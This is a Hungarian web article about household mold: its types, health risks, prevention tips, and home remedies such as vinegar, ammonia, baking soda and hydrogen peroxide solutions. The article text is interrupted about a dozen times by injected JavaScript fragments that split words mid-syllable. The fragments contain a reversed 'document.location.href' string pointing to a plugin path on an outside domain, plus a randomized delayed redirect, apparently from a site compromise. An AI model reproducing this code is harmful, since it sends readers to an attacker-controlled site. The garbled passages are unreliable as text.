Mi a penész?

A penész mikroszkopikus gombák egy csoportja, amelynek fajtái különböző formákban jelenhetnek meg.

Milyen környezetet kedvelnek a különböző penészgombák?

penészAz esetek többségében zárt térben képződik, ahol párás a levegő és nedvesek a felületek. Így legtöbbször falakon, ablakkereteken és egyéb penészedésre hajlamos helyeken jelennek meg. Több fajtája ismert, melyeket gyakorlatlan szemek színük alapján tudnak elkülöníteni. A penész az otthonunkban legtöbbször előforduló formája barna vagy fekete színű, de találkozhatunk egy másik fajtájával, ami kék vagy zöld árnyalatú

Valóban veszélyes a penész az egészségünkre?

Az ENSZ Egészségügyi Világszervezete azt állítja, hogy a penészes környezet sok-sok egészségügyi kockázatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot rejt, mely különösen a légzőszervi panaszoktól szenvedőkre lehet veszélyes. A penészgombáknak olyan melléktermékei is lehetnek, melyek súlyosan, irritálhatják a szemet, a tüdőt, az orr nyálkahártyáját, a bőrt és a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torkot is, még abban az esetben is, ha más esetben nem alakul ki allergiás reakció. A penészérzékenység hasonló tünetekkel járhat, mint bármilyen más allergia. Ezekről egy előző cikkünkben már bővebben is szó esett.
A legérzékenyebb személyeknél, a légzőszervi betegségtől szenvedőknél illetve a legyengült immunrendszerrel rendelkezőknél a penész felerősítheti a már meg lévő betegségek tüneteit, de abban az esetben, ha sokáig penészes környezetben vannak, akkor újabb betegségeket is okozhat. Különösen az asztmásokra leselkedik veszély. Egyes penészgombafajták súlyos tüdőbetegségeket, fertőzéseket, a tüdő szöveteinek hegesedését hozhatják létre.

Mit tehetünk a penész kialakulása ellen?

penészgomba1. Szelőztessünk gyakran!
2. A beázást okozó meghibásodásokat (például csőtörés, vízszivárgás) minél előbb szüntessük meg!
3. Lehetőség szerint ne a lakásban teregessünk, azonban ha erre nincs lehetőség, használjunk szárítógépet!
4. Súlyosabb esetben használjunk párátlanító berendezést!
5. A bútoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torainkat húzzuk kissé távolabb a faltól, így biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosítva a falak szellőzését!

A penészgombák ellen hatékonyan alkalmazható a NOVAERUS plazmatechnológiás légfertőtlenítő eszköz. Bővebben:
https://mediforte.hu/novaerus/

Mit tehetünk a már kialakult penészfoltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok eltávolítása érdekében?

Természetesen a boltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokban is vásárolhatunk különféle penészirtó szereket, de ha bio módszert szeretnénk ezek a lehetőségek állnak előttünk:

a) Ecetes házi szer
Elkészítés és használat:
Egy liter vizet forraljunk fel, és keverjük össze egy deciliter 20%-os ecettel! Egy tiszta szórófejes flakonba öntsük bele a keveréket, és fújjuk be vele a penészes területeket. Ha csempére használjuk akkor bátran súroljuk át kefével a felületet, falak esetében viszont inkább egy szivaccsal töröljük át óvatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan a kényes részt!

b) Az ammónia
Alkalmazás:
Keverjünk össze egy 2 dl ammóniát körülbelül három liter vízzel, majd vegyünk fel gumikesztyűt, és egy szivaccsal mossuk át a fertőzött területet az ammóniás oldattal! A teljes száradásig hagyjuk szabadon a kezelt felületeket, valamint használata közben folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan szellőztessünk.

c) Szódabikarbóna
Használata:
A legkönnyebb és egyben leghatékonyabb módszer, ha betesszük az anyagot a mosógépbe, és fél adag mosópor, fél adag szódabikarbóna elegyével a lehető legmagasabb hőfokon kimossuk a szövetet. Ha még biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabbak akarunk lenni benne, hogy hatni fog, öblítéshez használjunk ecetet!
Abban az esetben, ha nem tudjuk leszedni a huzatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot a kanapéról, keverjünk el egy kevés szódabikarbónát annyi ecettel, hogy sűrű, kenhető masszát kapjunk, ezzel kenjük be a penészfoltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot, majd egy fogkefével dörzsöljük a szövetek mélyéig az elegyet, majd hagyjuk teljesen kiszáradni!

d) Teafaolaj és ecet
Alkalmazás:
500 ml vízhez adjunk 100 ml teafaolajat és azonos mennyiségű 20%-os ecetet, ezzel a problémás területet! Kis idő múlva töröljük le papírtörlővel, majd alaposan szellőztessünk ki!

e) Hidrogén-peroxid
Előnyei:
A patikában oldatként tablettás kiszerelésben kapható fertőtlenítőszerből víztiszta, szagmentes oldatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot tudunk keverni. Széleskörűen alkalmazható, fertőtlenítő hatású háztartási tisztítószer, vízre és oxigénre bomlik, így nincs káros hatása a szervezetünkre.

Alkalmazása:
100 ml vízhez adjunk 3 tablettát. Ennél erősebb oldatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot ne készítsünk, mert a 30 %-nál töményebb oldat robbanásveszélyes! A hidrogén-peroxidos oldat fényre és szerves anyag hatására lebomlik, ezért a kész oldat rövid ideig tárolható! A problémás felületet egyszerűen csak permetezzük be az oldattal! Letörölni nem szükséges mivel magától elpárolog.